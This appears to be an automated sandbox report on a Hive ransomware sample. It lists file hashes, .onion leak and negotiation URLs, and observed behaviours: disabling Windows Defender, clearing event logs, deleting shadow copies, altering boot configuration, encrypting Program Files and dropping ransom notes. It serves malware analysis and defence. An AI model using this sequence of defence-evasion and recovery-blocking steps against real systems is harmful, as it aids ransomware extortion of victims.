Analysis
-
max time kernel
193s -
max time network
196s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:26
Static task
static1
Behavioral task
behavioral1
Sample
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
Resource
win7-en-20211208
General
-
Target
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe
-
Size
3.8MB
-
MD5
32bd8e6843879a761e6fa9436a90bb66
-
SHA1
26dde522d6f3f87ac982495028494c7f50799696
-
SHA256
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177
-
SHA512
c7e437c61980385ce57fe2a0dc0988aeba4609ac1ac7b7c07951c10c6bc38772c7ad1442571ab6409c8ea04991844e7ad95b5a9b35e31996f7aad9db4020716f
Malware Config
Extracted
C:\Program Files\7-Zip\rFSH_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 4088 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1852 bcdedit.exe 4072 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\DRUMROLL.WAV.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_OgAAADoAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookMedTile.scale-100.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\OneConnectWideTile.scale-125.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconOpenInRefocus.contrast-white_scale-100.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.scale-125.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Eye.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleMedTile.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_LAAAACwAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_GAAAABgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\lipssealed.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\WideTile.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\offsymxl.ttf 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Microsoft.People.Relevance.winmd 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\autumn_12s.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\18.rsrc 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_LAAAACwAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-RS\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp4-ul-phn.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3838_48x48x32.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\TabTip32.exe.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\MainPage\silverIcon.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\Sounds\Camcorder_stop_5.wav 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_GAAAABgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\WideTile.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\kk\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files\Microsoft Office\root\Office16\PROOF\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\SmallTile.scale-200.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-64.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcor.dll.mui 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_EgAAABIAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-oob.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-100.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\Interceptor.tlb.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_KAAAACgAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-48_altform-unplated.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\daily_challenge.jpg 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerMedTile.contrast-black_scale-125.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-white\MusicStoreLogo.scale-150_contrast-white.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\29.jpg 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\MedTile.scale-100.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_PAAAADwAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\rFSH_HOW_TO_DECRYPT.txt 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-16_altform-unplated.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ui-strings.js.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_GgAAABoAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_AAAAAAAAAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\MedTile.scale-100.png 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldNotMatch.snippets.ps1xml 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml.v4msMFGVBE3WWM1skHt_kxF-8lYmOJpwMMXtTX7XghD_HgAAAB4AAAA0.bvddx 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1972 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1196 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exepid process 3044 powershell.exe 3044 powershell.exe 3044 powershell.exe 2952 powershell.exe 2952 powershell.exe 2952 powershell.exe 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 4040 wevtutil.exe Token: SeBackupPrivilege 4040 wevtutil.exe Token: SeSecurityPrivilege 2956 wevtutil.exe Token: SeBackupPrivilege 2956 wevtutil.exe Token: SeSecurityPrivilege 3944 wevtutil.exe Token: SeBackupPrivilege 3944 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4076 wmic.exe Token: SeSecurityPrivilege 4076 wmic.exe Token: SeTakeOwnershipPrivilege 4076 wmic.exe Token: SeLoadDriverPrivilege 4076 wmic.exe Token: SeSystemProfilePrivilege 4076 wmic.exe Token: SeSystemtimePrivilege 4076 wmic.exe Token: SeProfSingleProcessPrivilege 4076 wmic.exe Token: SeIncBasePriorityPrivilege 4076 wmic.exe Token: SeCreatePagefilePrivilege 4076 wmic.exe Token: SeBackupPrivilege 4076 wmic.exe Token: SeRestorePrivilege 4076 wmic.exe Token: SeShutdownPrivilege 4076 wmic.exe Token: SeDebugPrivilege 4076 wmic.exe Token: SeSystemEnvironmentPrivilege 4076 wmic.exe Token: SeRemoteShutdownPrivilege 4076 wmic.exe Token: SeUndockPrivilege 4076 wmic.exe Token: SeManageVolumePrivilege 4076 wmic.exe Token: 33 4076 wmic.exe Token: 34 4076 wmic.exe Token: 35 4076 wmic.exe Token: 36 4076 wmic.exe Token: SeIncreaseQuotaPrivilege 3596 wmic.exe Token: SeSecurityPrivilege 3596 wmic.exe Token: SeTakeOwnershipPrivilege 3596 wmic.exe Token: SeLoadDriverPrivilege 3596 wmic.exe Token: SeSystemProfilePrivilege 3596 wmic.exe Token: SeSystemtimePrivilege 3596 wmic.exe Token: SeProfSingleProcessPrivilege 3596 wmic.exe Token: SeIncBasePriorityPrivilege 3596 wmic.exe Token: SeCreatePagefilePrivilege 3596 wmic.exe Token: SeBackupPrivilege 3596 wmic.exe Token: SeRestorePrivilege 3596 wmic.exe Token: SeShutdownPrivilege 3596 wmic.exe Token: SeDebugPrivilege 3596 wmic.exe Token: SeSystemEnvironmentPrivilege 3596 wmic.exe Token: SeRemoteShutdownPrivilege 3596 wmic.exe Token: SeUndockPrivilege 3596 wmic.exe Token: SeManageVolumePrivilege 3596 wmic.exe Token: 33 3596 wmic.exe Token: 34 3596 wmic.exe Token: 35 3596 wmic.exe Token: 36 3596 wmic.exe Token: SeIncreaseQuotaPrivilege 3596 wmic.exe Token: SeSecurityPrivilege 3596 wmic.exe Token: SeTakeOwnershipPrivilege 3596 wmic.exe Token: SeLoadDriverPrivilege 3596 wmic.exe Token: SeSystemProfilePrivilege 3596 wmic.exe Token: SeSystemtimePrivilege 3596 wmic.exe Token: SeProfSingleProcessPrivilege 3596 wmic.exe Token: SeIncBasePriorityPrivilege 3596 wmic.exe Token: SeCreatePagefilePrivilege 3596 wmic.exe Token: SeBackupPrivilege 3596 wmic.exe Token: SeRestorePrivilege 3596 wmic.exe Token: SeShutdownPrivilege 3596 wmic.exe Token: SeDebugPrivilege 3596 wmic.exe Token: SeSystemEnvironmentPrivilege 3596 wmic.exe Token: SeRemoteShutdownPrivilege 3596 wmic.exe Token: SeUndockPrivilege 3596 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3068 wrote to memory of 1332 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 1332 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1332 wrote to memory of 4084 1332 net.exe net1.exe PID 1332 wrote to memory of 4084 1332 net.exe net1.exe PID 3068 wrote to memory of 4080 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 4080 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 4080 wrote to memory of 2000 4080 net.exe net1.exe PID 4080 wrote to memory of 2000 4080 net.exe net1.exe PID 3068 wrote to memory of 1800 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 1800 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1800 wrote to memory of 2712 1800 net.exe net1.exe PID 1800 wrote to memory of 2712 1800 net.exe net1.exe PID 3068 wrote to memory of 1548 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 1548 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1548 wrote to memory of 2720 1548 net.exe net1.exe PID 1548 wrote to memory of 2720 1548 net.exe net1.exe PID 3068 wrote to memory of 1176 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 1176 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1176 wrote to memory of 2196 1176 net.exe net1.exe PID 1176 wrote to memory of 2196 1176 net.exe net1.exe PID 3068 wrote to memory of 440 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 440 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 440 wrote to memory of 3484 440 net.exe net1.exe PID 440 wrote to memory of 3484 440 net.exe net1.exe PID 3068 wrote to memory of 1412 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 1412 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 1412 wrote to memory of 1752 1412 net.exe net1.exe PID 1412 wrote to memory of 1752 1412 net.exe net1.exe PID 3068 wrote to memory of 2736 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 2736 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 2736 wrote to memory of 1892 2736 net.exe net1.exe PID 2736 wrote to memory of 1892 2736 net.exe net1.exe PID 3068 wrote to memory of 2600 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 3068 wrote to memory of 2600 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe net.exe PID 2600 wrote to memory of 3828 2600 net.exe net1.exe PID 2600 wrote to memory of 3828 2600 net.exe net1.exe PID 3068 wrote to memory of 3776 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 3776 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 3724 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 3724 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 884 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 884 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 3860 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 3860 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 960 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 960 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 2064 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 2064 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 2440 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 2440 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 1512 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 1512 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 1736 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 1736 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe sc.exe PID 3068 wrote to memory of 2008 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 2008 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 2176 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 2176 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe PID 3068 wrote to memory of 2388 3068 87967600b0f6026f97093416dcd7ec38f740adaf84757255c179180873b41177.exe reg.exe 